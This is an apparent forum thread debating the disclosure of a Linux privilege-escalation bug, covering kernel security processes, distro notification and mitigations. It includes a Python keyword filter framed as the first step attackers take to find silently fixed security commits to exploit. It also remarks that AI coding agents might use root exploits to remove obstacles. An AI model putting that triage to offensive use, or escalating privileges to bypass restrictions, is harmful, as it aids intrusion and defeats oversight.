Remember: whatever else grumpy sysadmins have to say about this, Xint are the good guys. Contrast them with the bad guys, who have vulnerabilities just as bad as CopyFail, but aren't disclosing them at all --- you only find out about them when it's discovered they're actively being exploited. There's no patch at all. There isn't even a characterization of how they work, so that you could quickly see what to seccomp. That's the actual threat environment serious Linux shops operate in.
LPEs are not rare.
As soon as a patch is committed, the clock starts ticking: the exploit will be discovered by reverse engineering recent commits. The commit was made on April 1st, and Xint disclosed it on the 29th. If the kernel security team had wanted to, they had 28 days to backport patches to the LTS branches...
So, I wouldn't put any blame on Xint there.
Opportunists are the ones who will sell a 0day to bad guys. Or who will drop a 0day publicly to promote their services. And they’ll fight tooth and nail against any actual legal obligation to engage in responsible and coordinated disclosure, because they make more money without that.
Using quotes around something where you’re actually doing a strawman paraphrase of another commenter you disagree with is bad form.
Ubuntu/RHEL is vulnerable and so are most Linux users by extension.
I absolutely 100% agree with this and I'm glad to see somebody saying it. Any system that is one LPE away from being compromised is already insecure.
The only important system that uses it as a security boundary is Android, and there it is mitigated by the fact that APKs need user approval, plus strict SELinux and seccomp policies, plus the GrapheneOS hardening; in this case the mitigations succeeded (https://discuss.grapheneos.org/d/35110-grapheneos-is-protect...)
On Hyperbola GNU/Linux, they will shift onto OpenBSD; they got fed up with the corporate slopware (and what proprietary Linux became). They will still make Hyperbola BSD GNU-license compatible, from the core to the userland tools.
In my case, I wish Emacs and the GNU developers embraced plotutils and left out Gnuplot (it is not GNU at all; worse, its license conflicts with the GPL), and made Texinfo independent of LaTeX for producing PDF and HTML files with equations. Groff + troff+pic+eqn already do that, no TeX Live needed. So can mandoc under OpenBSD, no magic needed, everything in a few MBs.
TeX Live is huge (a full install is over 7 GB), and the so-called free FSDG variant is not 100% free at all. With just that, GNU Emacs would be truly GNU-standalone, relying on GNU tools for plots under Emacs' Calc and for Texinfo books exported to PDF. A good plus for security.
Once you get that working, the rest would just follow. Also, GNU Hurd being developed with proprietary LLMs/SaaS is a disgrace against what GNU stands for. They can go back to the right path, but they need the will, for sure.
LPEs on Linux are obscenely commonplace.
I'm honestly unaware of what systems could be put in place to prevent this but expecting people to always do the right thing is fantasy level thinking. I mean I bet the disclosers thought they were doing the right thing, hence why it's a bad thing to rely on.
edit: spelling/grammar.
The kernel security team was given the heads up a month ago. At that point it is their decision.
It's fundamentally their position to not work the way that you describe.
I'd start with Greg's own words. You can probably find more on it from Spender/grsecurity's blog.
Partly they have a strong belief that all kernel bugs are vulnerabilities and all vulnerabilities are just bugs; sometimes taken to the extreme in both ways (on one hand this case where the vulnerability is almost ignored; on the other hand, I saw cases where a VM panic that could be triggered only by a misbehaving host—which could just choose to stop executing the VM—was given a CVE).
The reason they don't is because Linus and Greg have repeatedly, publicly stated that they don't want to because they don't believe that vulnerabilities conceptually make sense for the linux kernel and they refuse to engage in the process.
That's exactly what I wrote: "they have a strong belief that all kernel bugs are vulnerabilities and all vulnerabilities are just bugs; sometimes taken to the extreme in both ways".
But there is also a question of bandwidth. If a maintainer asks to bring a specific vulnerability to distros-list, the kernel security people will be reasonable. I did it last March.
As a first approximation: Ubuntu, Debian, and RHEL(-derived) to begin with, plus SUSE, which is big in the EU/server space (AIUI):
* https://commandlinux.com/statistics/most-popular-linux-distr...
* https://commandlinux.com/statistics/linux-server-market-shar...
Seems like Gentoo, Arch, Mint, and Slackware could also be as well:
* https://distrowatch.com/dwres.php?resource=major
U/Deb/RHEL are 'upstream' of a lot of other projects, and fixes would trickle down to Rocky, Alma, etc. Perhaps VM OS in cloud (AWS, Azure) could be a usage gauge as well.
But publishing a working exploit together with the disclosure before patches are available is really really irresponsible, maybe even criminal.
And no, the proposed mitigations don't help with half of the distributions out there...
What’s your theory here? What crime?
Also, all kinds of aiding and abetting.
Copying from the comment I was replying to:
> But publishing a working exploit together with the disclosure before patches are available is really really irresponsible, maybe even criminal
But it’s not the law anywhere I’m aware of today, and I’d not support it becoming a law.
Instead of that, you’d rather make the law compel free individuals to limit their speech, or to hand over their work to big companies privately, so big companies can save money?
That doesn’t sound like a nice future, if it’s even enforceable at all.
That's beside the point. If people use the official mitigation on https://copy.fail/#mitigation they will not sufficiently protect themselves on mainstream distros like Ubuntu and Debian.
The page also states
> Most major distributions are shipping the fix now.
This text was probably prepared in advance, but this was simply not true at the time of publication.
Edit: As of this writing, most distros, including Red Hat, Fedora, and Debian Stable, do not have patches available in the package repos, though they're being actively worked on.
Considering that the patches have been available for a while, someone surely reversed what they were for and was actually exploiting this in the wild.
In the age of AI, I’d argue that “responsible disclosure” is dead. Arguably even in closed-source projects. Just ask Claude to diff the previous version against the current one and say whether anything fixed in there could have had security implications.
We’re not there yet, but very soon the only way to responsibly disclose a vulnerability will be immediately.
Linux kernel is one of the most audited open-source projects ever. I guarantee you that someone did reverse the patch.
> but forgot to tell the distros
Probably an oversight, but irrelevant. The bug was in the linux kernel. It's insane to suggest that they should have notified everyone shipping the linux kernel.
With the way linux is used these days, I'd guess the number of systems with untrusted local users is pretty limited. Even with shared hosting, you generally have root in your VM or container anyway. Unless this enables an escape from that?
Still the risk that people who run "curl | bash" without care could get bitten, but usually it's "curl | sudo bash" anyway...
Lots of shared hosters don't use VMs or containers. It's some arbitrary number of people logging in to a shared system, each one with a home directory under /home/THE_USER_NAME. I've had several such hosters over the years (thankfully not right now, though).
Things like HPC clusters are multiuser & don't entirely trust their users. If they did we wouldn't need users/groups/permissions etc in the first place.
And then there are users running claude-cli and friends who may just find it convenient to use a local root exploit to remove obstacles.
So containers don't protect you, only a VM.
How so?
But even if you think making unethical decisions in personal self interest is something no one should be criticized for, surely the Linux kernel team ought to have some process for notifying the top distributions of an upcoming LPE, just out of practicality.
Distros are downstream of kernel, that doesn’t entitle them to expect to be contacted directly by every security reporter. That’s not on them. Distros that are big enough should be plugged into the linux security team for notifications.
Security researchers cannot be held responsible for broken lines of communication within the org charts of projects that they study. They’re providing a valuable public service already, how much more do you want?
Yes it does. That's how it's always been done and distros can ship a fix well before it ends up in a kernel release.
Any strategy that assumes the rest of the world is functional, or that makes you personally responsible for fixing all of it, is equally broken; but there is a reasonable middle ground, and sending a few more emails lies within it.
> we can always help them by mandating that they spend 6 figures
Who’s we? Mandate with what authority? AWS and GCP are downstream another level. Should the reporter also have worked with them? And their customers? And the customers of their customers?
IMO this whole discussion seems like people are annoyed by the security researchers doing god’s work and wish they didn’t exist or think that they should be fully subservient to the projects and companies they are helping for free. The bugs were there before the researchers revealed them!!
Most people in tech think like the techie in this comic strip.
A large percentage of kernel fixes have the potential to be similarly bad. For some the potential isn't even realized until after the fix has shipped.
Every stable release, GregKH says you must upgrade now because there is something security-relevant in there. This happens at least once a week.
As for shared hosting providers, it is my sense that there is always at least one local privilege escalation available to miscreants, making shared hosting safe only if there is a certain amount of trust.
I remember bugs that were similarly bad from my university days 30+ years ago. Has anything substantially changed?
I'd consider a shared hoster which allows users to run their own (native) code and doesn't use VMs for tenant isolation extremely irresponsible in 2026.
I could equally ask: "Who knows how many attackers learned about this vulnerability from this disclosure, and used it before the distributions fixed it?"
So maybe folks should take a break from the kind of armchair quarterbacking that this was “incredibly irresponsible”, as was done upthread, or that the researchers should be blacklisted for life, as a parallel commenter stated.
The hilarious bit is that the idea that they needed to coordinate is clearly broken even in just this example. They did give prior notice to the Linux developers, who issued a patch. And they’re still getting raked over the coals in this comment page by armchair quarterbacks who have decided they needed to coordinate with specific distros. If they’d coordinated with those distros, somebody would have a pet distro that didn’t make the cut and they’d be pissed about that.
There are risks no matter how they do it, and there will be people who are pissed no matter how they do it. Security researchers don’t owe anybody a specific methodology.
So I feel like the argument reduces into "why is it a problem that now anyone could exploit it, if some people were exploiting it already". Which imho isn't a sensible argument because the issue is clearly the amount of people capable of using the exploit for nefarious purposes, which has increased.
“Because we can’t know if there was exploitation by existing parties who had discovered the vulnerability on their own, there are upsides to disclosing earlier so that affected users can take mitigating steps and review their systems for indicators of compromise. Additionally, the more projects the researchers pull into the loop for coordinated disclosure, the higher the likelihood that they further leak the vulnerability to more attackers.”
However, the issue is that we cannot know whether the attack space has been broadened or lessened as a consequence of this disclosure, because of how eager it was. If it weren't so eager, we could be much more comfortable in suggesting that the attack space has probably been reduced.
Given the exploit had been living in the Linux code base undetected for so long, and given the distributions are the principal attack vector, I think it's fair to say that disclosing the exploit before the distributions were ready made the situation worse, and that the researcher should reflect on their actions.
The idea about the available exploit space and how the actors within it might, or might not move is a much more interesting avenue of conversation and I thank you for elaborating on your initial comment. <3
I do however feel that it's hard to be confident about whether the attack space has been increased or reduced as a consequence of the eager disclosure. I feel we could make the case either way.
Anything else is inevitably worse for the public good.
Having spent that entire time and then some on both offensive and defensive teams, I assure you longer delays after notification do NOT decrease the overall risk to the public.
There's a reason we've landed where we have as a security community.
It's an advertisement for an unpatched critical exploit and apparently some kind of infosec company.
And if you disclose to just a handful, why ignore the rest?
The disclosure is private. Meaning neither the commit messages nor any public info can leak too much information about the bug. It's usually kept rather discreet.
It is impractical for the kernel to broadcast to all its users privately.
Meaning that either a) distro maintainers should be privy to it, but where does this end?[1] or b) we have the current situation
[1] probably the top 5 distros security teams can just be copied into the private mail. Maybe the kernel security private list can forward the emails to them as well.
Problem is, every other type of communication between distros and kernel is implicit. In commit messages, patches and release notes. So it's an exceptional case.
BTW, with LLMs there's a new issue. It is now cheap to scan the kernel commit log, maybe even in linux-next, and ask an LLM to identify what could be a patch for a private disclosure, and then immediately RE the patch and exploit it on deployed kernels.
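As a toy illustration of how cheap that first triage pass already is, even without an LLM: a keyword scan over commit subjects narrows the haystack a lot. Everything below (the keyword list, the sample subjects) is made up for illustration; a real attacker would feed the diffs themselves to a model.

```python
import re

# Heuristic filter over commit subjects: flag ones that smell like
# silently-fixed security bugs. An LLM would do this far better; this
# only shows the shape of the triage step. The keywords are guesses.
SUSPECT = re.compile(
    r"overflow|out[- ]of[- ]bounds|use[- ]after[- ]free|double free|"
    r"bounds check|off[- ]by[- ]one|sanitize",
    re.IGNORECASE,
)

def likely_security_fix(subject: str) -> bool:
    """Return True if a commit subject matches a security-ish pattern."""
    return bool(SUSPECT.search(subject))

subjects = [
    "crypto: fix out-of-bounds copy in aead request handling",
    "docs: update maintainers entry",
    "net: add missing bounds check on option length",
]
# Flags the crypto and net fixes, not the docs change.
flagged = [s for s in subjects if likely_security_fix(s)]
print(flagged)
```

Any commit this flags then gets its diff reverse-engineered, which is exactly why the "silent fix" window is shorter than it used to be.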
That is unfortunately not true. I left my last one only a few years ago and they're still going strong without me.
None? Because nobody* does hosting using Linux users as a security boundary. It's not the 90s.
* Standard HN disclaimer for people that think that some retro shell box with 10 users disproves "nobody": nobody does not literally mean exactly 0 people in this context.
Maybe it is irresponsible how little attention we pay to software security. Maybe, software developers of all kind should spend an entire year not developing any features at all, but fix all the tech debt of 30 years instead.
Yes, that sounds revolutionary, but I do not see an alternative in an age where AI agents are all you need to find kernel bugs of this scale.
It's a total arsehole'y move to not share with open-source projects (like Debian) but for commercial vendors like Microsoft I don't give a crap.
Now let's not get carried away either: that's a privilege escalation, so it already requires access to a local account. We're not exactly in Jia Tan "I backdoor every SSH out there if your Linux distro is using systemd" territory either.
Maybe a decade of corporations with revenue in the billions paying peanuts and coffee money for critical vulnerability disclosures made it....
Yes, this was clearly a marketing stunt to promote Xint code.
I, for one, will never use Xint code and will advise everyone to never use it. To anyone working there: enjoy your 15 minutes, I hope this backfires right in your face.
External security research happens for one of only a few reasons typically:
1) hobbyists who are learning or just like to do it for fun
2) bug bounties (good luck with those in most open source)
3) marketing for security companies
4) non-public research going to CNO/CNE
If you want to kill 3, the output of 1 will not come close to 4 and the public is NOT better off with fewer public bugs.
It is a really, really bad look for Linux, and pours a bit of cold water on all the hype around switching from Windows.
For single user systems (not rigorously defined, I presume it's the intersection of our two definitions which we might be talking about) the nature of the exploit is local privilege escalation, of which there could be many possible, and many mitigations / countermeasures against. This could have suddenly appeared from the ether of "unknown unknowns" for some people.
Those people farther up the food chain still potentially have service accounts, maybe even user accounts for some purposes, perhaps "trusted" services which deliver them code which they deserialize and run once. (Have a pickle.)
severity * impact * likelihood
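To make that formula concrete, here is a toy scoring sketch; the 1-to-5 scales and the example numbers are my own assumptions, not any standard:

```python
def risk_score(severity: int, impact: int, likelihood: int) -> int:
    """Multiply the three 1-5 factors into a 1-125 composite score."""
    for v in (severity, impact, likelihood):
        assert 1 <= v <= 5, "each factor is on a 1-5 scale"
    return severity * impact * likelihood

# Same LPE bug, two deployments: on a single-user desktop the likelihood
# of a hostile local user is low, so the composite stays modest...
desktop = risk_score(severity=5, impact=4, likelihood=1)   # 20
# ...while on a shared multi-user host the likelihood factor jumps.
shared = risk_score(severity=5, impact=4, likelihood=4)    # 80
print(desktop, shared)
```

The point of the multiplication is that any single low factor pulls the whole score down, which is why the same kernel bug rates so differently across the deployments discussed above.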
Not everyone looking to migrate from Windows 95 plans to run everything as root afterward.
On the copy.fail site:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
Not everybody needs or wants to wait for their distro, or plans to patch their IC firmware when a config change will do. No OS is perfect. The awkward rollout for this bug fix is proof of that.
Said no one ever...present post excluded :-))
I disagree. Exploits should be published as soon as they are written, and vulnerability findings should include as much detail as possible, because if the researchers cannot write an exploit, someone else could.
- this has the advantage of forcing upgrades as soon as possible. No more “we need to see and schedule patching”
- publishing it as soon as possible makes everyone aware of the threat
- it is a learning experience for everyone
- “responsible disclosure” was invented by lazy companies that have zero interest in fixing a problem quickly